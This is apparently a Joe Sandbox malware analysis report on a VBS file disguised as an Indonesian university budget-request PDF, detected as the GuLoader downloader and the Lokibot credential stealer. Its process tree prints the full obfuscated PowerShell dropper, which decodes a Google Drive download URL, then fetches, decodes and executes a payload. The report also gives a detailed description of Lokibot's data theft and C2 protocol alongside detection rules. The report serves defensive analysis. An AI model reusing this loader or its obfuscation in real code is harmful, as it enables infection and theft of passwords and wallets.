Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs

Overview

General Information

Sample name:PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:PERMINTAAN ANGGARAN (Universitas IPB) ID177888pdf.vbs
Analysis ID:1523886
MD5:cf3ce0d565b919fe45d02705736fe824
SHA1:0924076c6434b432b18fd0b298a2b5b14e38b754
SHA256:96c1a11d9036afc58f65d8533f2c37b7fc64048e21bc60f28f0bb9311902e80f
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7352 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehlAdrenTVar,iyLat.rpFib seCythe],ermi:Aaben:Alei TR diolGrftesSolhj1 smad2Tubel ');$Tessituras160=$trebanen[0];$saurels=(Preeliminator 'algo,$Hepp.gRearrlSweenoAllerbD oleaAfgifLEfter:F lberBadgeeBaadfP,uperEKarritOpkl,iKrsantElledi RestO LiqunAmin ASekunR I.teYDiplo=Tran NMag,eE MisiWputre-NatarONd inbForldjR ulmeBasisCMidenTNonn. Rec.nSCac.cyCapriSO,idetPo,ygEsmaasMArcha.Flo snD pliEDemiotSt ns.Stam wB nebeSkrumbRep ocUdgralglitti Sm kE eklaN P.antvaler ');Glederens ($saurels);Glederens (Preeliminator ' Unsc$Limi.Rungare.edsppAmbuleSurintM,untiStrint,ovediPartso BalanCas,faLarrur MillyPerni.Em erHSkbneeTitteaP,otodRoyale Blksr ,ills rga[Omkr $IndfdM OvereRa iul fsbtHocklomousin krue]Asper=torre$ .icrSpamfipBlu pikontrsUndereCrossfSerabrSyntei CharkuratuvEddicaAh ldr ,rantkompoeEny lrHypaceNonqutFaglo ');$Band=Preeliminator 'Petau$nykalRDykkee St.rp MadoeCautitMyrici BlomtEpigri PreaoSt ernBasilaOsterrBankrydomes.Til gDFolkeoRemovwIn imn.krivlAf ilo Kursa Fa ldKnaldFBerthiOpfanlablace nat(Vir e$P.rseTRhinoeSammesArccosOverdiPangetx loguRegnorConyzaNon.osSva m1Pr nt6 Pell0Surre,Legul$ KawcBS unklCo.ntaOrdfjdSeriesAlette ,kanlC rollSvolveForeprTreski U ar) Hy,e ';$Bladselleri=$Verdenshistoriskes;Glederens (Preeliminator 'vitam$U irkGFarveLechoiOR litB eriAOvervLMishm:ProviUAkamndGalacSMonogTDi raiR,stbl etiLUdskreOverstaglyc=Dephl(Ge yrtAgerjEFremssPaupeTSacri-FiskepCl ngAsurpaTSchizhBlot Fdsel$ B atbBallylGj rdafrancDTh.otSMicroESoci,LB,uxiLTricoEAppriRFj,rdiMal,i)Smls ');while (!$Udstillet) {Glederens (Preeliminator 'Urede$St.ejg MetolCou soBeskfb SlgeaD athlgasap: ashlITelfonOversv TirsaNo malSsonaiBrug dAlthoeTailopSt kne Physn Sagas,rissiE bezo.accin rugsbl ck= Torv$ KelptArkairUnupbu Tet.e va.e ') ;Glederens $Band;Glederens (Preeliminator 'KoordSCykeltClarkaLiebhr MarktTusin-BrnehSDelkllRen,eeRe peeAbstrpUnco Intui4 Moan ');Glederens (Preeliminator 'm,tth$ NipsgNot rl Cai.o LoesbReearaBoplsl nden:EclipUGalocd lomssNo,imtGrafiiOverllMisfolHete eAn,latSydam=Afsti(PlaneT Amuzec,rsosGummitElevc-Ind rPStrafaOvah.twowi,h pent Permi$ OverB Wal l varmaAut cdHainasR,sbeecardilPrecol ProleEmissrSu.eriDolph)S urp ') ;Glederens (Preeliminator ' Kay $Pu slgChervlclodpoKlingb Geoma pklalS,rre:GalliASoricnRomertOve pi Duehk Un.evDe,tea IncorSkriniBeforafjerbtMor.i= Z,nt$UgenngEnv,ilKonseo,ibiabCensuam strl Bl,n: Sam.Tearwio Noniu W rksFrem lKirkeiOp.arnbetingHuser+Jul s+ igma%Nas e$ D.tetUnshrr,aandeAltanbGeneraadre nHandeeWintenLitho. pfancPerfoo prruKomman .gentH,nli ') ;$Tessituras160=$trebanen[$Antikvariat];}$Getlingndsunknes198=318869;$Negrita=32225;Glederens (Preeliminator 'Mo,fa$UddykgPresulInteroKollebOverlaNema l equi:UdbliPOverloCocond oldaa rounr ReligTrammeCalor Coxc= Co s ProfeGSheareE imytP odu-KultuCrulleoMisaln,iggit yline ombenPrecut Erig umy,d$ ko pB Hem l rminaI,dekd.ravlsSp.cieMaa el CabolCac ee kolrShtchiGoka ');Glederens (Preeliminator 'Hobna$Deka,gConf.lbe,vroDybs,bJessiaBerewl desi:TilstShor,euArlanpHyptre PerirCur ecOpvasa.osadrArgumg Fed,o IdiosStupe Ener=Margi Geofy[LapidS adeay elarsKo eatBev eePrehumlamia. ,alaCZornuo Un enBega vDiploe iscrNeddytRetsh]Balan: Skif:FedteFErnrirI,eogoUndermCre yBUnm.caErgoms ConseAver 6Re re4TavleSfugletchancrFdreliMessenPassagExpon(Nstfo$ EnnaPDi tio Sigtd ,oraaD vnsr MahjgCloyleSkatt)gulds ');Glederens (Preeliminator 'R pub$ RibbgToothlFugleo St ab HoflaForstlMeddl:por,vTTvrstoMashmn.edaieTrucul Sm,aeWishej ngreBefootadgans.abar C,ika= Groo minar[ Dra.S tuthyPseuds Teletsamree StrumLu er.overdTSv neeEcle xMediot Gill.SobreEs.norn ReficSata,o N.tadTatteiF nsenFimengLatir].eign: itro:Cyke.A GlemSFiskeClg dgI umynI,lind. TotaGSphagepseudtEneboSBestvtDybb rmelleiB,quan ensagDimid(Buder$Ag veSTimokuParafp UdgieTvan rKumulc gejlaMumblrfrivogKo meoWaspisUnder)Bru e ');Glederens (Preeliminator 'Iri e$TamergTu,nelAsepso okumbUntenaF derlTi li:Prut PFo ndfr.emig p in=Rygep$ pa.tTTirehoVkstrnBaronehirudlPaviseVelrvjSnuereVan,ltRukbasTr si.OmstnsAffutuOutspbUnpeds Veint Brutr Ruski Kas,nUncaug Lowl(Masse$ForldGOver.eIldfut ,ttalDeseciSkra nBighogImprinstuehdCha.cs.bbatuOvercnBondukStrepnSubtre Mon,s apit1Opbe.9Taeni8Inter,Ti,st$CatnaNPh ageSwinkgko.terRobiniR.lent InveaTmrer)Sky d ');Glederens $Pfg;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7784 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehlAdrenTVar,iyLat.rpFib seCythe],ermi:Aaben:Alei TR diolGrftesSolhj1 smad2Tubel ');$Tessituras160=$trebanen[0];$saurels=(Preeliminator 'algo,$Hepp.gRearrlSweenoAllerbD oleaAfgifLEfter:F lberBadgeeBaadfP,uperEKarritOpkl,iKrsantElledi RestO LiqunAmin ASekunR I.teYDiplo=Tran NMag,eE MisiWputre-NatarONd inbForldjR ulmeBasisCMidenTNonn. Rec.nSCac.cyCapriSO,idetPo,ygEsmaasMArcha.Flo snD pliEDemiotSt ns.Stam wB nebeSkrumbRep ocUdgralglitti Sm kE eklaN P.antvaler ');Glederens ($saurels);Glederens (Preeliminator ' Unsc$Limi.Rungare.edsppAmbuleSurintM,untiStrint,ovediPartso BalanCas,faLarrur MillyPerni.Em erHSkbneeTitteaP,otodRoyale Blksr ,ills rga[Omkr $IndfdM OvereRa iul fsbtHocklomousin krue]Asper=torre$ .icrSpamfipBlu pikontrsUndereCrossfSerabrSyntei CharkuratuvEddicaAh ldr ,rantkompoeEny lrHypaceNonqutFaglo ');$Band=Preeliminator 'Petau$nykalRDykkee St.rp MadoeCautitMyrici BlomtEpigri PreaoSt ernBasilaOsterrBankrydomes.Til gDFolkeoRemovwIn imn.krivlAf ilo Kursa Fa ldKnaldFBerthiOpfanlablace nat(Vir e$P.rseTRhinoeSammesArccosOverdiPangetx loguRegnorConyzaNon.osSva m1Pr nt6 Pell0Surre,Legul$ KawcBS unklCo.ntaOrdfjdSeriesAlette ,kanlC rollSvolveForeprTreski U ar) Hy,e ';$Bladselleri=$Verdenshistoriskes;Glederens (Preeliminator 'vitam$U irkGFarveLechoiOR litB eriAOvervLMishm:ProviUAkamndGalacSMonogTDi raiR,stbl etiLUdskreOverstaglyc=Dephl(Ge yrtAgerjEFremssPaupeTSacri-FiskepCl ngAsurpaTSchizhBlot Fdsel$ B atbBallylGj rdafrancDTh.otSMicroESoci,LB,uxiLTricoEAppriRFj,rdiMal,i)Smls ');while (!$Udstillet) {Glederens (Preeliminator 'Urede$St.ejg MetolCou soBeskfb SlgeaD athlgasap: ashlITelfonOversv TirsaNo malSsonaiBrug dAlthoeTailopSt kne Physn Sagas,rissiE bezo.accin rugsbl ck= Torv$ KelptArkairUnupbu Tet.e va.e ') ;Glederens $Band;Glederens (Preeliminator 'KoordSCykeltClarkaLiebhr MarktTusin-BrnehSDelkllRen,eeRe peeAbstrpUnco Intui4 Moan ');Glederens (Preeliminator 'm,tth$ NipsgNot rl Cai.o LoesbReearaBoplsl nden:EclipUGalocd lomssNo,imtGrafiiOverllMisfolHete eAn,latSydam=Afsti(PlaneT Amuzec,rsosGummitElevc-Ind rPStrafaOvah.twowi,h pent Permi$ OverB Wal l varmaAut cdHainasR,sbeecardilPrecol ProleEmissrSu.eriDolph)S urp ') ;Glederens (Preeliminator ' Kay $Pu slgChervlclodpoKlingb Geoma pklalS,rre:GalliASoricnRomertOve pi Duehk Un.evDe,tea IncorSkriniBeforafjerbtMor.i= Z,nt$UgenngEnv,ilKonseo,ibiabCensuam strl Bl,n: Sam.Tearwio Noniu W rksFrem lKirkeiOp.arnbetingHuser+Jul s+ igma%Nas e$ D.tetUnshrr,aandeAltanbGeneraadre nHandeeWintenLitho. pfancPerfoo prruKomman .gentH,nli ') ;$Tessituras160=$trebanen[$Antikvariat];}$Getlingndsunknes198=318869;$Negrita=32225;Glederens (Preeliminator 'Mo,fa$UddykgPresulInteroKollebOverlaNema l equi:UdbliPOverloCocond oldaa rounr ReligTrammeCalor Coxc= Co s ProfeGSheareE imytP odu-KultuCrulleoMisaln,iggit yline ombenPrecut Erig umy,d$ ko pB Hem l rminaI,dekd.ravlsSp.cieMaa el CabolCac ee kolrShtchiGoka ');Glederens (Preeliminator 'Hobna$Deka,gConf.lbe,vroDybs,bJessiaBerewl desi:TilstShor,euArlanpHyptre PerirCur ecOpvasa.osadrArgumg Fed,o IdiosStupe Ener=Margi Geofy[LapidS adeay elarsKo eatBev eePrehumlamia. ,alaCZornuo Un enBega vDiploe iscrNeddytRetsh]Balan: Skif:FedteFErnrirI,eogoUndermCre yBUnm.caErgoms ConseAver 6Re re4TavleSfugletchancrFdreliMessenPassagExpon(Nstfo$ EnnaPDi tio Sigtd ,oraaD vnsr MahjgCloyleSkatt)gulds ');Glederens (Preeliminator 'R pub$ RibbgToothlFugleo St ab HoflaForstlMeddl:por,vTTvrstoMashmn.edaieTrucul Sm,aeWishej ngreBefootadgans.abar C,ika= Groo minar[ Dra.S tuthyPseuds Teletsamree StrumLu er.overdTSv neeEcle xMediot Gill.SobreEs.norn ReficSata,o N.tadTatteiF nsenFimengLatir].eign: itro:Cyke.A GlemSFiskeClg dgI umynI,lind. TotaGSphagepseudtEneboSBestvtDybb rmelleiB,quan ensagDimid(Buder$Ag veSTimokuParafp UdgieTvan rKumulc gejlaMumblrfrivogKo meoWaspisUnder)Bru e ');Glederens (Preeliminator 'Iri e$TamergTu,nelAsepso okumbUntenaF derlTi li:Prut PFo ndfr.emig p in=Rygep$ pa.tTTirehoVkstrnBaronehirudlPaviseVelrvjSnuereVan,ltRukbasTr si.OmstnsAffutuOutspbUnpeds Veint Brutr Ruski Kas,nUncaug Lowl(Masse$ForldGOver.eIldfut ,ttalDeseciSkra nBighogImprinstuehdCha.cs.bbatuOvercnBondukStrepnSubtre Mon,s apit1Opbe.9Taeni8Inter,Ti,st$CatnaNPh ageSwinkgko.terRobiniR.lent InveaTmrer)Sky d ');Glederens $Pfg;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8076 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000004.00000002.2721566180.0000000008430000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.2710566286.000000000565A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000004.00000002.2721776675.0000000008B75000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 6 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_7408.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi64_7408.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0x100e7:$b2: ::FromBase64String(
                • 0xd458:$s1: -join
                • 0x6c04:$s4: +=
                • 0x6cc6:$s4: +=
                • 0xaeed:$s4: +=
                • 0xd00a:$s4: +=
                • 0xd2f4:$s4: +=
                • 0xd43a:$s4: +=
                • 0xf7fc:$s4: +=
                • 0xf87c:$s4: +=
                • 0xf942:$s4: +=
                • 0xf9c2:$s4: +=
                • 0xfb98:$s4: +=
                • 0xfc1c:$s4: +=
                • 0xdc8b:$e4: Get-WmiObject
                • 0xde7a:$e4: Get-Process
                • 0xded2:$e4: Start-Process
                amsi32_7784.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xac7c:$b2: ::FromBase64String(
                • 0x9cf0:$s1: -join
                • 0x349c:$s4: +=
                • 0x355e:$s4: +=
                • 0x7785:$s4: +=
                • 0x98a2:$s4: +=
                • 0x9b8c:$s4: +=
                • 0x9cd2:$s4: +=
                • 0x14412:$s4: +=
                • 0x14492:$s4: +=
                • 0x14558:$s4: +=
                • 0x145d8:$s4: +=
                • 0x147ae:$s4: +=
                • 0x14832:$s4: +=
                • 0xa523:$e4: Get-WmiObject
                • 0xa712:$e4: Get-Process
                • 0xa76a:$e4: Start-Process
                • 0x150a2:$e4: Get-Process

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", ProcessId: 7352, ProcessName: wscript.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.18.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 59082
